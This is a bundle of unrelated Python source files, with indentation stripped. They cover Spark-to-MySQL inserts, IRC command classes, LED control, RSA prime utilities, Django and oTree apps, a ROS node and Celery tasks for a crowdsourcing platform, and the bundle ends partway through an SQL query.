logging.info("social_undirected_node_sql_rdd.take(3):{0}".format(social_undirected_node_sql_rdd.take(3)))
# prepare to insert sql to database
node_sql_rdd_list = [bio_directed_node_sql_rdd, bio_undirected_node_sql_rdd,\
info_directed_node_sql_rdd, info_undirected_node_sql_rdd,\
social_directed_node_sql_rdd, social_undirected_node_sql_rdd]
cursor = self.con.cursor()
success_update = 0
failure_update = 0
split_num_for_each_rdd = 32
for rdd_idx in xrange(len(node_sql_rdd_list)):
node_sql_rdd = node_sql_rdd_list[rdd_idx]
logging.info("==========={0}th rdd_idx===========".format(rdd_idx))
sub_node_sql_rdd_list = node_sql_rdd.randomSplit(xrange(split_num_for_each_rdd))
for sub_rdd_idx in xrange(len(sub_node_sql_rdd_list)):
sub_rdd = sub_node_sql_rdd_list[sub_rdd_idx]
sub_node_sql_list = sub_rdd.collect()
logging.info("==========={0}th sub_rdd_idx===========".format(sub_rdd_idx))
for sql_idx in xrange(len(sub_node_sql_list)):
sql = sub_node_sql_list[sql_idx]
if (sql_idx % 10000 == 0 and sql_idx > 9998) or (sql_idx == len(sub_node_sql_list) -1):
logging.info("==========={0}th element in sub_node_sql_list===========".format(sql_idx))
logging.info("sql_execute_index:{idx}, finish rate:{rate}".format(idx = sql_idx, rate = float(sql_idx+1)/ len(sub_node_sql_list)))
logging.info("success_rate:{success_rate}".format(success_rate = success_update/ float(success_update + failure_update + 1)))
logging.info("success_update:{success}, failure_update:{failure}".format(success = success_update, failure = failure_update))
try:
cursor.execute(sql)
self.con.commit()
success_update = success_update + 1
except MySQLdb.Error, e:
self.con.rollback()
logging.error("MySQL Error {error_num}: {error_info}.".format(error_num = e.args[0], error_info = e.args[1]))
logging.error("error SQL:{0}".format(sql))
failure_update = failure_update + 1
cursor.close()
# un-persist rdd previously persisted rdd
logging.info("bio_directed_node_sql_rdd.unpersist().is_cached:{0}".format(bio_directed_node_sql_rdd.unpersist().is_cached))
logging.info("bio_undirected_node_sql_rdd.unpersist().is_cached:{0}".format(bio_undirected_node_sql_rdd.unpersist().is_cached))
logging.info("info_directed_node_sql_rdd.persist().is_cached:{0}".format(info_directed_node_sql_rdd.unpersist().is_cached))
logging.info("info_undirected_node_sql_rdd.persist().is_cached:{0}".format(info_undirected_node_sql_rdd.unpersist().is_cached))
logging.info("social_directed_node_sql_rdd.persist().is_cached:{0}".format(social_directed_node_sql_rdd.unpersist().is_cached))
logging.info("social_undirected_node_sql_rdd.persist().is_cached:{0}".format(social_undirected_node_sql_rdd.unpersist().is_cached))
################################### PART3 CLASS TEST ##################################
'''
# Initialization
database_name = "LinkPredictionDB"
connection_table_name = "connection_table"
node_table_name = "node_table"
from pyspark import SparkContext
pyspark_sc = SparkContext()
Computer = ComputeNodeProperty(database_name = database_name, pyspark_sc = pyspark_sc)
network_rdd_list = Computer.read_connection_data_in_database(database_name = database_name,\
connection_table_name = connection_table_name)
node_data_rdd_list = Computer.compute_degree_in_different_network(network_rdd_list = network_rdd_list)
Computer.save_node_data_rdd_list_to_database(database_name = database_name,\
node_table_name = node_table_name,\
node_data_rdd_list = node_data_rdd_list)
'''
|
from dataclasses import dataclass
from typing import Optional
@dataclass
class Endpoint:
host: str
port: int
ssl: bool
@dataclass
class Credentials:
username: str
password: str
@dataclass
class RawCommand:
prefix: str
command: str
args: list[str]
class Command:
def to_irc(self) -> str:
raise NotImplementedError
@staticmethod
def from_raw_command(raw_command: RawCommand) -> "Command":
raise NotImplementedError
@dataclass
class Pass(Command):
password: str
def to_irc(self) -> str:
return f"PASS {self.password}"
@dataclass
class Nick(Command):
nick: str
def to_irc(self) -> str:
return f"NICK {self.nick}"
@dataclass()
class Privmsg(Command):
target: str
message: str
user: Optional[str] = None
def to_irc(self) -> str:
return f"PRIVMSG {self.target} : {self.message}"
@staticmethod
def from_raw_command(raw_command: RawCommand) -> "Privmsg":
target = raw_command.args[0]
message = raw_command.args[1]
user = raw_command.prefix.split("!")[0]
return Privmsg(target, message, user)
@dataclass
class Ping(Command):
message: str
@staticmethod
def from_raw_command(raw_command: RawCommand) -> "Ping":
message = raw_command.args[0]
return Ping(message)
@dataclass
class Pong(Command):
message: str
def to_irc(self) -> str:
return f"PONG :{self.message}"
@dataclass
class Join(Command):
channel: str
def to_irc(self) -> str:
return f"JOIN #{self.channel}"
@dataclass
class Part(Command):
channel: str
def to_irc(self) -> str:
return f"PART #{self.channel}"
IRC_DATACLASS_MAP = {
"PRIVMSG": Privmsg,
"PING": Ping,
}
|
# Lifo queues
# That stands for last in first out. You can imagine this queue like some sort of stack. The element you put last on top of the stack is the first that you can get from it.
import queue
q = queue.LifoQueue()
numbers = [1, 2, 3, 4, 5]
for x in numbers:
q.put(x)
while not q.empty():
print(q.get())
# Prioritizing queues
q = queue.PriorityQueue()
q.put((8, "Some string"))
q.put((1, 2023))
q.put((90, True))
q.put((2, 10.23))
while not q.empty():
print(q.get()) # Or q.get()[1] to access only the actual value
|
from tests.utils import W3CTestCase
class TestDisplayInlineGrid(W3CTestCase):
vars().update(W3CTestCase.find_tests(__file__, 'display-inline-grid'))
|
#!/usr/bin/python
import time
from neopixel import *
import argparse
import sys
# LED strip configuration:
LED_COUNT = 3 # Number of LED pixels.
LED_PIN = 18 # GPIO pin connected to the pixels (must support PWM!).
LED_FREQ_HZ = 800000 # LED signal frequency in hertz (usually 800khz)
LED_DMA = 10 # DMA channel to use for generating signal (try 10)
LED_BRIGHTNESS = 50 # Set to 0 for darkest and 255 for brightest
LED_INVERT = False # True to invert the signal (when using NPN transistor level shift)
LED_CHANNEL = 0
LED_STRIP = ws.WS2812_STRIP
#LED_STRIP = ws.SK6812W_STRIP
# Create NeoPixel object with appropriate configuration.
strip = Adafruit_NeoPixel(LED_COUNT, LED_PIN, LED_FREQ_HZ, LED_DMA, LED_INVERT, LED_BRIGHTNESS, LED_CHANNEL, LED_STRIP)
# Intialize the library (must be called once before other functions).
strip.begin()
try:
for i in range(4):
strip.setPixelColor(0, Color(0, 200, 0))
strip.setPixelColor(1, Color(0, 200, 0))
strip.setPixelColor(2, Color(0, 200, 0))
strip.show()
time.sleep(1)
strip.setPixelColor(0, Color(0, 0, 0))
strip.setPixelColor(1, Color(0, 0, 0))
strip.setPixelColor(2, Color(0, 0, 0))
strip.show()
time.sleep(0.5)
while True:
line = raw_input ()
if line == "ON":
strip.setPixelColor(0, Color(255, 200, 0))
strip.setPixelColor(1, Color(255, 200, 0))
strip.setPixelColor(2, Color(255, 200, 0))
strip.show()
elif line == "BLUE":
strip.setPixelColor(0, Color(0, 0, 255))
strip.setPixelColor(1, Color(0, 0, 255))
strip.setPixelColor(2, Color(0, 0, 255))
strip.show()
elif line == "QUIT":
strip.setPixelColor(0, Color(0, 0, 0))
strip.setPixelColor(1, Color(0, 0, 0))
strip.setPixelColor(2, Color(0, 0, 0))
strip.show()
break
else:
strip.setPixelColor(0, Color(0, 0, 0))
strip.setPixelColor(1, Color(0, 0, 0))
strip.setPixelColor(2, Color(0, 0, 0))
strip.show()
except KeyboardInterrupt:
print "Shutting down"
strip.setPixelColor(0, Color(0, 0, 0))
strip.setPixelColor(1, Color(0, 0, 0))
strip.setPixelColor(2, Color(0, 0, 0))
strip.show()
|
from rest_framework import serializers
from .models import DigitalBookPDF
class DigitalBookPDFSerializer(serializers.ModelSerializer):
class Meta:
model = DigitalBookPDF
fields = (
'id',
'book',
'pdf',
)
|
import collections
class NyotaUhura:
def valid_no_decrease(self, start, end):
validcodes = []
for code in range(start, end):
code = str(code)
decrease = False
for pos in range(0, len(code)-1):
value1 = int(code[pos])
value2 = int(code[pos+1])
calc = value2 - value1
if calc < 0:
decrease = True
if not decrease:
validcodes.append(code)
return validcodes
def valid_same(self, codes):
validcodes = []
for code in codes:
same = False
for pos in range(0, len(code)-1):
value1 = int(code[pos])
value2 = int(code[pos+1])
calc = value2 - value1
if calc == 0:
same = True
if same:
validcodes.append(code)
return validcodes
def valid_larger_group(self, codes):
validcodes = []
for code in codes:
c=collections.Counter(code)
large = False
for count in c.values():
count = int(count)
if count == 2:
large = True
if large:
validcodes.append(code)
return validcodes
|
"""
A single regression test case.
"""
import unittest
from regression_tests.test_case_name import TestCaseName
from regression_tests.utils.os import make_dir_name_valid
class TestCase:
"""A single regression test case."""
# Prevent nosetests from considering this class as a class containing unit
# tests.
__test__ = False
def __init__(self, test_module, test_class, test_settings):
"""
:param ~regression_tests.test_module.TestModule test_module: Testing
module.
:param ~regression_tests.test.Test test_class: Testing class.
:param ~regression_tests.test_settings.TestSettings: Settings for the
test.
"""
self._test_module = test_module
self._test_class = test_class
self._test_settings = test_settings
@property
def test_module(self):
"""The testing module
(:class:`~regression_tests.test_module.TestModule`).
"""
return self._test_module
@property
def test_class(self):
"""The testing class (:class:`~regression_tests.test.Test`).
"""
return self._test_class
@property
def test_settings(self):
"""The test settings
(:class:`~regression_tests.test_settings.TestSettings`).
"""
return self._test_settings
@property
def name(self):
"""Name of the test case (:class:`.TestCaseName`)."""
return TestCaseName.from_tool_arguments(
self.test_class.__name__,
self._tool_arguments
)
@property
def module_name(self):
"""Name of the module in which the test case is located (`str`)."""
return self.test_module.name
@property
def full_name(self):
"""Full name of the test case (`str`), including module name."""
return '{}.{}'.format(
self.test_module.name,
self.name
)
@property
def dir(self):
"""Directory containing the test."""
return self.test_module.dir
@property
def tool(self):
"""Name of the tested tool."""
return self.test_settings.tool
@property
def tool_arguments(self):
"""Tool arguments for the test case."""
return self._tool_arguments.with_rebased_files(
inputs_dir=self.test_module.dir,
outputs_dir=self.tool_dir
)
@property
def tool_dir(self):
"""Directory for the outputs of the tool."""
outputs_dir = self.test_module.dir.get_dir(
self.test_settings.outputs_dir_name
)
return outputs_dir.get_dir(
make_dir_name_valid(
self.name,
path_to_dir=outputs_dir.path,
max_nested_file_length=self._max_file_length_in_tool_dir
)
)
@property
def tool_timeout(self):
"""Timeout for the tool."""
return self.test_settings.timeout
def create_test_suite(self, tool):
"""Creates a test suite for the given tool.
:param Tool tool: The tool for the suite.
"""
suite = unittest.TestSuite()
test_names = unittest.defaultTestLoader.getTestCaseNames(
self.test_class
)
for test_name in test_names:
suite.addTest(
self.test_class(
tool,
self.test_settings,
methodName=test_name
)
)
return suite
@property
def _tool_arguments(self):
"""Tool arguments."""
return self.test_settings.tool_arguments
@property
def _max_file_length_in_tool_dir(self):
"""Maximal length of a file in the tool directory."""
# We use a heuristic because we cannot foresee what file names may be
# generated in the future.
if not self.test_settings.input:
return 0
# When the 'input' contains multiple files in a tuple, we have to check
# all of them. To handle this uniformly, get an iterable of input files
# and iterate over this iterable. When there is a single input file,
# this iterable will be a singleton list.
if isinstance(self.test_settings.input, tuple):
input_files = self.test_settings.input
else:
input_files = [self.test_settings.input]
max_length = 0
for input_file in input_files:
# Reserve sufficient space for suffixes (e.g. "-unpacked" or
# ".c.backend.bc").
max_length += len(input_file) + 30
return max_length
|
# -*- coding: utf-8 -*-
"""与素数相关的数值函数
"""
from rsa._compat import range
import rsa.common
import rsa.randnum
__all__ = ['getprime', 'are_relatively_prime']
def gcd(p, q):
"""返回最大公约数,辗转相除法
>>> gcd(48, 180)
12
"""
while q != 0:
(p, q) = (q, p % q)
return p
def get_primality_testing_rounds(number):
"""返回几轮米勒Rabing素性测试的最低数量,
基于数字bitsize。
据NIST FIPS186-4,附录C,表C.3的最小数量
轮M-R的测试,使用的2 **(-100)的误差概率,对
不同P,Q bitsizes是:
* P,Q bitsize:512;回合:7
* P,Q bitsize:1024;回合:4
* P,Q bitsize:1536;回合:3
请参阅:http://nvlpubs.nist.gov/nistpubs/FIPS/NIST.FIPS.186-4.pdf
"""
# Calculate number bitsize.
bitsize = rsa.common.bit_size(number)
# Set number of rounds.
if bitsize >= 1536:
return 3
if bitsize >= 1024:
return 4
if bitsize >= 512:
return 7
# For smaller bitsizes, set arbitrary number of rounds.
return 10
def miller_rabin_primality_testing(n, k):
"""计算n是复合(这是总是正确的)或总理
(理论上是不正确与错误概率4** - K),由
运用米勒 - 拉宾素性测试。
借鉴和实现的例子,请参阅:
https://en.wikipedia.org/wiki/Miller%E2%80%93Rabin_primality_test
:参数n为整数,为素性测试。
:N型:INT
:参数K:发米勒罗宾测试(证人)的数量。
:K型:INT
:返回:如果假数为复合材料,真要是它可能是素数。
:舍入类型:BOOL
"""
# prevent potential infinite loop when d = 0
if n < 2:
return False
# Decompose (n - 1) to write it as (2 ** r) * d
# While d is even, divide it by 2 and increase the exponent.
d = n - 1
r = 0
while not (d & 1):
r += 1
d >>= 1
# Test k witnesses.
for _ in range(k):
# Generate random integer a, where 2 <= a <= (n - 2)
a = rsa.randnum.randint(n - 3) + 1
x = pow(a, d, n)
if x == 1 or x == n - 1:
continue
for _ in range(r - 1):
x = pow(x, 2, n)
if x == 1:
# n is composite.
return False
if x == n - 1:
# Exit inner loop and continue with next witness.
break
else:
# If loop doesn't break, n is composite.
return False
return True
def is_prime(number):
"""如果是素数返回True.
>>> is_prime(2)
True
>>> is_prime(42)
False
>>> is_prime(41)
True
"""
# 小数的检查.
if number < 10:
return number in {2, 3, 5, 7}
# 偶数.
if not (number & 1):
return False
# 计算最少的回合数.
k = get_primality_testing_rounds(number)
# 进行(minimum + 1)轮素性测试。.
return miller_rabin_primality_testing(number, k + 1)
def getprime(nbits):
"""返回有nbits位的素数.
>>> p = getprime(128)
>>> is_prime(p-1)
False
>>> is_prime(p)
True
>>> is_prime(p+1)
False
>>> from rsa import common
>>> common.bit_size(p) == 128
True
"""
assert nbits > 3 # the loop wil hang on too small numbers
while True:
integer = rsa.randnum.read_random_odd_int(nbits)
# Test for primeness
if is_prime(integer):
return integer
# Retry if not prime
def are_relatively_prime(a, b):
"""如果互质就返回True
>>> are_relatively_prime(2, 3)
True
>>> are_relatively_prime(2, 4)
False
"""
d = gcd(a, b)
return d == 1
if __name__ == '__main__':
print('Running doctests 1000x or until failure')
import doctest
for count in range(1000):
(failures, tests) = doctest.testmod()
if failures:
break
if count and count % 100 == 0:
print('%i times' % count)
print('Doctests done')
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.6 on 2018-04-03 20:45
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('mathswizard', '0035_studentprofile_levelprog'),
]
operations = [
migrations.RenameField(
model_name='studentprofile',
old_name='levelProg',
new_name='levelprog',
),
]
|
from otree.api import (
models, widgets, BaseConstants, BaseSubsession, BaseGroup, BasePlayer,
Currency as c, currency_range
)
import random
author = 'Your name here'
doc = """
Your app description
"""
class Constants(BaseConstants):
name_in_url = 'questionaire'
players_per_group = None
num_rounds = 1
class Subsession(BaseSubsession):
def creating_session(self):
players = self.get_players()
for p in players:
p.truth = random.randint(1, 6)
class Group(BaseGroup):
pass
class Player(BasePlayer):
truth = models.IntegerField()
choice = models.IntegerField(
label='Сообщите, какое число выпало на кубике. В дополнение к вашему основному выигрышу мы вам заплатим столько HSE',
choices=[1,2,3,4,5,6],
widget=widgets.RadioSelectHorizontal
)
|
#!/usr/bin/env python
'''
This node is for combining all the sensor readings into a message and publishing on
/sensor_reading.
'''
import rospy
from ros_cellphonerobot.msg import Sensors
from sensor_msgs.msg import Range
def cb(msg):
global sensor_readings
message = Sensors()
message = sensor_readings
message.distance = msg
pub.publish(message)
rospy.loginfo("Update distance")
if __name__ == '__main__':
try:
sensor_readings = Sensors()
rospy.init_node("sensor_hub", anonymous=True)
rospy.Subscriber("distance", Range ,cb)
pub = rospy.Publisher("sensor_reading", Sensors, queue_size=10)
rospy.spin()
except rospy.ROSInterruptException:
pass
|
from data_importers.management.commands import BaseHalaroseCsvImporter
class Command(BaseHalaroseCsvImporter):
council_id = "E07000029"
addresses_name = (
"parl.2019-12-12/Version 1/polling_station_export-2019-11-14cope.csv"
)
stations_name = (
"parl.2019-12-12/Version 1/polling_station_export-2019-11-14cope.csv"
)
elections = ["parl.2019-12-12"]
allow_station_point_from_postcode = False
def address_record_to_dict(self, record):
rec = super().address_record_to_dict(record)
uprn = record.uprn.strip().lstrip("0")
if uprn == "10000901653":
rec["postcode"] = "CA27 0AT"
if record.housepostcode in [
"CA28 6AQ",
"CA20 1EE",
]:
return None
if uprn in [
"10000896294", # CA191XR -> CA191XG : Whitegarth, Drigg, Holmrook, Cumbria
"10000893985", # CA191UU -> CA191TJ : Birkerthwaite, Birker Moor, Eskdale Green, Eskdale, Cumbria
"100110689644", # LA195UR -> LA195UD : Shannon Rise, Summer Hill, Bootle, Millom, Cumbria
]:
rec["accept_suggestion"] = True
if uprn in [
"10000896318", # CA191XD -> CA191XE : Sandford, Drigg, Holmrook, Cumbria
"100110311815", # LA184DE -> LA184DG : 49 Wellington Street, Millom, Cumbria
"10000897219", # LA195UP -> LA195UR : Moor Green, Whitbeck, Millom, Cumbria
"10000891448", # CA263XG -> CA263XF : Tile Kiln, Arlecdon Park Road, Arlecdon, Frizington, Cumbria
"10000904699", # CA145UJ -> LA184EY : 3 Globe Terrace, Main Street, Distington, Workington, Cumbria
]:
rec["accept_suggestion"] = False
return rec
|
from .backend import *
from .frontend import *
from .preprocessing import *
from .utils import *
|
from __future__ import division
import json
from collections import OrderedDict
from datetime import timedelta
from decimal import Decimal, ROUND_UP
import numpy as np
from django.conf import settings
from django.contrib.auth.models import User
from django.db import connection, transaction
from django.db.models import F, Q
from django.utils import timezone
from ws4redis.publisher import RedisPublisher
from ws4redis.redis_store import RedisMessage
import constants
from crowdsourcing import models
from crowdsourcing.crypto import to_hash
from crowdsourcing.emails import send_notifications_email, send_new_tasks_email, send_task_returned_email, \
send_task_rejected_email, send_project_completed
from crowdsourcing.payment import Stripe
from crowdsourcing.redis import RedisProvider
from crowdsourcing.utils import hash_task
from csp.celery import app as celery_app
from mturk.tasks import get_provider
def _expire_returned_tasks():
now = timezone.now()
if now.weekday() in [5, 6]:
return 'WEEKEND'
# noinspection SqlResolve
query = '''
with task_workers as (
SELECT *
FROM (
SELECT
tw.id,
CASE WHEN EXTRACT(DOW FROM now()) <= %(dow)s
THEN tw.returned_at + INTERVAL %(exp_days)s
ELSE tw.returned_at END returned_at
FROM crowdsourcing_taskworker tw
INNER JOIN crowdsourcing_task t ON tw.task_id = t.id
WHERE tw.status = %(status)s) r
WHERE (now() - INTERVAL %(exp_days)s)::timestamp > r.returned_at
)
UPDATE crowdsourcing_taskworker tw_up SET status=%(expired)s, updated_at=now()
FROM task_workers
WHERE task_workers.id=tw_up.id
RETURNING tw_up.id, tw_up.worker_id
'''
cursor = connection.cursor()
cursor.execute(query,
{
'status': models.TaskWorker.STATUS_RETURNED,
'expired': models.TaskWorker.STATUS_EXPIRED,
'exp_days': '{} day'.format(settings.EXPIRE_RETURNED_TASKS),
'dow': settings.EXPIRE_RETURNED_TASKS
})
workers = cursor.fetchall()
cursor.close()
worker_list = []
task_workers = []
for w in workers:
worker_list.append(w[1])
task_workers.append({'id': w[0]})
refund_task.delay(task_workers)
update_worker_cache.delay(worker_list, constants.TASK_EXPIRED)
return 'SUCCESS'
@celery_app.task(ignore_result=True)
def expire_tasks():
cursor = connection.cursor()
# noinspection SqlResolve
query = '''
WITH taskworkers AS (
SELECT
tw.id,
p.id project_id
FROM crowdsourcing_taskworker tw
INNER JOIN crowdsourcing_task t ON tw.task_id = t.id
INNER JOIN crowdsourcing_project p ON t.project_id = p.id
INNER JOIN crowdsourcing_taskworkersession sessions ON sessions.task_worker_id = tw.id
WHERE tw.status=%(in_progress)s
GROUP BY tw.id, p.id
HAVING sum(coalesce(sessions.ended_at, now()) - sessions.started_at) >
coalesce(p.timeout, INTERVAL '24 hour'))
UPDATE crowdsourcing_taskworker tw_up SET status=%(expired)s
FROM taskworkers
WHERE taskworkers.id=tw_up.id
RETURNING tw_up.id, tw_up.worker_id
'''
cursor.execute(query,
{'in_progress': models.TaskWorker.STATUS_IN_PROGRESS, 'expired': models.TaskWorker.STATUS_EXPIRED})
workers = cursor.fetchall()
cursor.close()
worker_list = []
task_workers = []
for w in workers:
worker_list.append(w[1])
task_workers.append({'id': w[0]})
refund_task.delay(task_workers)
update_worker_cache.delay(worker_list, constants.TASK_EXPIRED)
_expire_returned_tasks()
return 'SUCCESS'
@celery_app.task(ignore_result=True)
def auto_approve_tasks():
now = timezone.now()
# if now.weekday() in [5, 6]:
# return 'WEEKEND'
# if now.weekday() == 0 and now.hour < 15:
# return 'MONDAY'
cursor = connection.cursor()
# noinspection SqlResolve
query = '''
WITH taskworkers AS (
SELECT
tw.id,
p.id project_id,
p.group_id project_gid,
tw.task_id,
u.id user_id,
u.username,
u_worker.username worker_username
FROM crowdsourcing_taskworker tw
INNER JOIN crowdsourcing_task t ON tw.task_id = t.id
INNER JOIN crowdsourcing_project p ON t.project_id = p.id
INNER JOIN auth_user u ON p.owner_id = u.id
INNER JOIN auth_user u_worker ON tw.worker_id = u_worker.id
WHERE tw.submitted_at + INTERVAL %(auto_approve_freq)s < NOW()
AND tw.status=%(submitted)s)
UPDATE crowdsourcing_taskworker tw_up SET status=%(accepted)s, approved_at = %(approved_at)s,
auto_approved=TRUE
FROM taskworkers
WHERE taskworkers.id=tw_up.id
RETURNING tw_up.id, tw_up.worker_id, taskworkers.task_id, taskworkers.user_id, taskworkers.username,
taskworkers.project_gid, taskworkers.worker_username
'''
cursor.execute(query,
{'submitted': models.TaskWorker.STATUS_SUBMITTED,
'accepted': models.TaskWorker.STATUS_ACCEPTED,
'approved_at': now,
'auto_approve_freq': '{} hour'.format(settings.AUTO_APPROVE_FREQ)})
task_workers = cursor.fetchall()
for w in task_workers:
task_workers.append({'id': w[0]})
post_approve.delay(w[2], 1)
redis_publisher = RedisPublisher(facility='notifications', users=[w[4], w[6]])
message = RedisMessage(
json.dumps({"event": 'TASK_APPROVED', "project_gid": w[5], "project_key": to_hash(w[5])}))
redis_publisher.publish_message(message)
cursor.close()
return 'SUCCESS'
@celery_app.task(ignore_result=True)
def update_worker_cache(workers, operation, key=None, value=None):
provider = RedisProvider()
for worker in workers:
name = provider.build_key('worker', worker)
if operation == constants.TASK_ACCEPTED:
provider.hincrby(name, 'in_progress', 1)
elif operation == constants.TASK_SUBMITTED:
provider.hincrby(name, 'in_progress', -1)
provider.hincrby(name, 'submitted', 1)
elif operation == constants.TASK_REJECTED:
provider.hincrby(name, 'submitted', -1)
provider.hincrby(name, 'rejected', 1)
elif operation == constants.TASK_RETURNED:
provider.hincrby(name, 'submitted', -1)
provider.hincrby(name, 'returned', 1)
elif operation == constants.TASK_APPROVED:
provider.hincrby(name, 'submitted', -1)
provider.hincrby(name, 'approved', 1)
elif operation in [constants.TASK_EXPIRED, constants.TASK_SKIPPED]:
provider.hincrby(name, 'in_progress', -1)
elif operation == constants.ACTION_GROUP_ADD:
provider.set_add(name + ':worker_groups', value)
elif operation == constants.ACTION_GROUP_REMOVE:
provider.set_remove(name + ':worker_groups', value)
elif operation == constants.ACTION_UPDATE_PROFILE:
provider.set_hash(name, key, value)
return 'SUCCESS'
@celery_app.task(ignore_result=True)
def email_notifications():
users = User.objects.all()
url = '%s/%s/' % (settings.SITE_HOST, 'messages')
users_notified = []
for user in users:
email_notification, created = models.EmailNotification.objects.get_or_create(recipient=user)
if created:
# unread messages
message_recipients = models.MessageRecipient.objects.filter(
status__lt=models.MessageRecipient.STATUS_READ,
recipient=user
).exclude(message__sender=user)
else:
# unread messages since last notification
message_recipients = models.MessageRecipient.objects.filter(
status__lt=models.MessageRecipient.STATUS_READ,
created_at__gt=email_notification.updated_at,
recipient=user
).exclude(message__sender=user)
message_recipients = message_recipients.order_by('-created_at') \
.select_related('message', 'recipient', 'message__sender') \
.values('created_at', 'message__body', 'recipient__username', 'message__sender__username')
result = OrderedDict()
# group messages by sender
for message_recipient in message_recipients:
if message_recipient['message__sender__username'] in result:
result[message_recipient['message__sender__username']].append(message_recipient)
else:
result[message_recipient['message__sender__username']] = [message_recipient]
messages = [{'sender': k, 'messages': v} for k, v in result.items()]
if len(messages) > 0:
# send email
send_notifications_email(email=user.email, url=url, messages=messages)
users_notified.append(user)
# update the last time user was notified
models.EmailNotification.objects.filter(recipient__in=users_notified).update(updated_at=timezone.now())
return 'SUCCESS'
@celery_app.task(bind=True, ignore_result=True)
def create_tasks(self, tasks):
try:
with transaction.atomic():
task_obj = []
x = 0
for task in tasks:
x += 1
hash_digest = hash_task(task['data'])
t = models.Task(data=task['data'], hash=hash_digest, project_id=task['project_id'],
row_number=x)
task_obj.append(t)
models.Task.objects.bulk_create(task_obj)
models.Task.objects.filter(project_id=tasks[0]['project_id']).update(group_id=F('id'))
except Exception as e:
self.retry(countdown=4, exc=e, max_retries=2)
return 'SUCCESS'
@celery_app.task(bind=True, ignore_result=True)
def create_tasks_for_project(self, project_id, file_deleted):
project = models.Project.objects.filter(pk=project_id).first()
if project is None:
return 'NOOP'
previous_rev = models.Project.objects.prefetch_related('batch_files', 'tasks').filter(~Q(id=project.id),
group_id=project.group_id) \
.order_by('-id').first()
previous_batch_file = previous_rev.batch_files.first() if previous_rev else None
models.Task.objects.filter(project=project).delete()
if file_deleted:
models.Task.objects.filter(project=project).delete()
task_data = {
"project_id": project_id,
"data": {}
}
task = models.Task.objects.create(**task_data)
if previous_batch_file is None and previous_rev is not None:
task.group_id = previous_rev.tasks.all().first().group_id
else:
task.group_id = task.id
task.save()
# price_data = models.Task.objects.filter(project_id=project_id, price__isnull=False).values_list('price',
# flat=True)
_set_aux_attributes(project, [])
return 'SUCCESS'
try:
with transaction.atomic():
data = project.batch_files.first().parse_csv()
task_obj = []
x = 0
previous_tasks = previous_rev.tasks.all().order_by('row_number') if previous_batch_file else []
previous_count = len(previous_tasks)
for row in data:
x += 1
hash_digest = hash_task(row)
price = None
if project.allow_price_per_task and project.task_price_field is not None:
price = row.get(project.task_price_field)
t = models.Task(data=row, hash=hash_digest, project_id=int(project_id), row_number=x, price=price)
if previous_batch_file is not None and x <= previous_count:
if len(set(row.items()) ^ set(previous_tasks[x - 1].data.items())) == 0:
t.group_id = previous_tasks[x - 1].group_id
task_obj.append(t)
models.Task.objects.bulk_create(task_obj)
price_data = models.Task.objects.filter(project_id=project_id, price__isnull=False).values_list('price',
flat=True)
_set_aux_attributes(project, price_data)
models.Task.objects.filter(project_id=project_id, group_id__isnull=True) \
.update(group_id=F('id'))
except Exception as e:
self.retry(countdown=4, exc=e, max_retries=2)
return 'SUCCESS'
def _set_aux_attributes(project, price_data):
if project.aux_attributes is None:
project.aux_attributes = {}
if not len(price_data):
max_price = float(project.price)
min_price = float(project.price)
median_price = float(project.price)
else:
max_price = float(np.max(price_data))
min_price = float(np.min(price_data))
median_price = float(np.median(price_data))
project.aux_attributes.update({"min_price": min_price, "max_price": max_price, "median_price": median_price})
project.save()
@celery_app.task(ignore_result=True)
def pay_workers():
workers = User.objects.all()
payment = Stripe()
# total = 0
#
for worker in workers:
task_workers = models.TaskWorker.objects.prefetch_related('task__project') \
.filter(worker=worker,
status=models.TaskWorker.STATUS_ACCEPTED,
is_paid=False)
for tw in task_workers:
payment.pay_worker(tw)
def single_payout(amount, user):
return 'OBSOLETE METHOD'
@celery_app.task(ignore_result=True)
def post_approve(task_id, num_workers):
task = models.Task.objects.prefetch_related('project').get(pk=task_id)
latest_revision = models.Project.objects.filter(~Q(status=models.Project.STATUS_DRAFT),
group_id=task.project.group_id) \
.order_by('-id').first()
latest_revision.amount_due -= Decimal(num_workers * latest_revision.price)
latest_revision.save()
return 'SUCCESS'
def create_transaction(sender_id, recipient_id, amount, reference):
return 'OBSOLETE METHOD'
@celery_app.task(ignore_result=True)
def refund_task(task_worker_in):
return 'OBSOLETE METHOD'
@celery_app.task(ignore_result=True)
def update_feed_boomerang():
logs = []
cursor = connection.cursor()
last_update = timezone.now() - timedelta(minutes=settings.HEART_BEAT_BOOMERANG)
projects = models.Project.objects.filter(status=models.Project.STATUS_IN_PROGRESS,
min_rating__gt=1.0,
enable_boomerang=True,
rating_updated_at__lt=last_update)
for project in projects:
if project.min_rating == 3.0:
project.min_rating = 2.0
project.previous_min_rating = 3.0
elif project.min_rating == 2.0:
project.min_rating = 1.99
project.previous_min_rating = 2.0
elif project.min_rating == 1.99:
project.min_rating = 1.0
project.previous_min_rating = 1.99
project.rating_updated_at = timezone.now()
project.save()
logs.append(
models.BoomerangLog(object_id=project.group_id, min_rating=project.min_rating,
rating_updated_at=project.rating_updated_at,
reason='DEFAULT'))
# noinspection SqlResolve
email_query = '''
SELECT
available.id,
available.group_id,
owner_profile.handle,
u_workers.id,
sum(available) available_count,
u_workers.email,
available.name,
coalesce((available.aux_attributes ->> 'median_price') :: NUMERIC, available.price)
FROM (
SELECT
p.id,
p.group_id,
p.name,
owner_id,
p.min_rating,
p.price,
p.aux_attributes,
sum(1) available
FROM crowdsourcing_task t
INNER JOIN (SELECT
group_id,
max(id) id
FROM crowdsourcing_task
WHERE deleted_at IS NULL
GROUP BY group_id) t_max ON t_max.id = t.id
INNER JOIN crowdsourcing_project p ON p.id = t.project_id
INNER JOIN (
SELECT
t.group_id,
sum(t.done) done
FROM (
SELECT
t.group_id,
CASE WHEN (tw.worker_id IS NOT NULL)
AND tw.status NOT IN (4, 6, 7)
THEN 1
ELSE 0 END done
FROM crowdsourcing_task t
LEFT OUTER JOIN crowdsourcing_taskworker tw ON t.id = tw.task_id
WHERE t.exclude_at IS NULL AND t.deleted_at IS NULL) t
GROUP BY t.group_id)
t_count ON t_count.group_id = t.group_id AND t_count.done < p.repetition
WHERE p.status = 3 AND p.deleted_at IS NULL
GROUP BY p.id, p.name, owner_id, p.min_rating, p.group_id, p.price, aux_attributes) available
INNER JOIN auth_user u_workers ON TRUE
INNER JOIN crowdsourcing_userprofile p_workers ON p_workers.user_id = u_workers.id
AND p_workers.is_worker IS TRUE
